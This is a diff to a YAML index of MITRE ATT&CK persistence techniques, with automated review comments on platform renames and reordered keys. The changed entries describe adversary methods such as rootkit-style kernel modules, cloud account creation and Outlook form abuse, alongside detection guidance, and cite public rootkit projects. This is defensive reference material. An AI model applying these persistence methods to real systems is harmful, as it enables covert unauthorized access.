- name: Reg Key Run
@@ -55919,7 +56346,7 @@ persistence:
elevation_required: true
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -55932,9 +56359,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -55943,13 +56372,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
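Review bot: the platform list for T1136.003 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider` (T1098 receives the same change further down); any tooling or per-platform index that filters tests by the old platform strings will stop matching these techniques, so the platform-to-index mapping needs to be updated in the same change rather than left for a follow-up.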
@@ -55997,14 +56426,11 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests: []
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -56040,16 +56466,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -56090,7 +56515,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Admin Account Manipulate
@@ -56585,138 +57009,137 @@ persistence:
commands first\"\n}\n"
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
- source_name: Purves Kextpocalypse 2
- url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
description: Richard Purves. (2017, November 9). MDM and the Kextpocalypse
. Retrieved September 23, 2021.
+ url: https://richard-purves.com/2017/11/09/mdm-and-the-kextpocalypse-2/
- source_name: RSAC 2015 San Francisco Patrick Wardle
- url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
description: Wardle, P. (2015, April). Malware Persistence on OS X Yosemite.
Retrieved April 6, 2018.
+ url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: Synack Secure Kernel Extension Broken
- url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
description: Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel
Extension Loading’ is Broken. Retrieved April 6, 2018.
+ url: https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/
- source_name: Wikipedia Loadable Kernel Module
- url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
description: Wikipedia. (2018, March 17). Loadable kernel module. Retrieved
April 9, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
-
- When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
-
- Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
-
- Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
-
- Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
- x_mitre_detection: |
- Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
-
- Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
-
- On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: Snake Malware Kernel Driver Comadmin
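Review bot: this hunk rewrites the whole T1547.006 object because of key reordering, and the substantive changes are buried inside it: the `modified` timestamp, the `x_mitre_attack_spec_version` bump from `2.1.0` to `3.2.0`, the `spec_version` removal, and the iDefense citation's URL moving from `http://www.megasecurity.org/papers/Rootkits.pdf` to `https://` with its retrieved date changing to September 12, 2024. Review it with a move-aware diff (`git diff --color-moved`) or diff the old and new `description` and `x_mitre_detection` blocks separately to confirm the moved text is byte-identical, since a silent wording change would be invisible in this form.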
@@ -56779,7 +57202,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -56805,12 +57228,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
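Review bot: for the KernelCallbackTable object both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are deleted and, unlike the other objects in this diff, no `x_mitre_attack_spec_version: 3.2.0` is added in their place within this hunk; confirm the key is emitted earlier in the reordered object, otherwise the regenerated entry has lost its spec version entirely.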
@@ -56888,9 +57309,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1542.004:
@@ -56917,7 +57337,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -56939,41 +57359,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
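Review bot: `spec_version: '2.1'` (together with `x_mitre_attack_spec_version: 2.1.0`) is deleted from the technique that opens this hunk, and the same `spec_version` line is removed from every technique in the rest of this file. Confirm that the index renderers do not read that field and record the drop as intentional in the PR description; a wholesale removal of a STIX field is easy to mistake for data loss in a generated diff of this size.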
@@ -56982,22 +57371,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
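Review bot: nearly all of the lines added for T1137.003 here (`x_mitre_platforms`, `x_mitre_domains`, `id`, `type`, `created`, `created_by_ref`, `external_references`, `object_marking_refs`) are the same fields that the previous hunk deleted from this technique, emitted in a different key order; the substantive changes are `Office 365` becoming `Office Suite`, `x_mitre_version` going from `1.1` to `1.2`, `x_mitre_attack_spec_version` from `2.1.0` to `3.2.0`, the new `revoked: false` and `x_mitre_deprecated: false` keys, and the dropped `x_mitre_permissions_required` block. Sorting keys deterministically in the generator (or preserving the previous order) would reduce hunks like this pair to the semantic changes and make the platform rename reviewable at a glance.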
@@ -57063,7 +57479,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -57137,11 +57552,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -57158,7 +57572,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -57168,7 +57581,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -57177,19 +57590,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
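Review bot: the T1078 platform list loses `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider` (with `x_mitre_version` moving from `2.6` to `2.7`); any per-platform index or filter that selects techniques by the old platform strings will silently drop Valid Accounts, so whatever keys on those names should be updated in the same change and the derived indexes regenerated with it.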
@@ -57237,11 +57648,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -57270,24 +57682,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
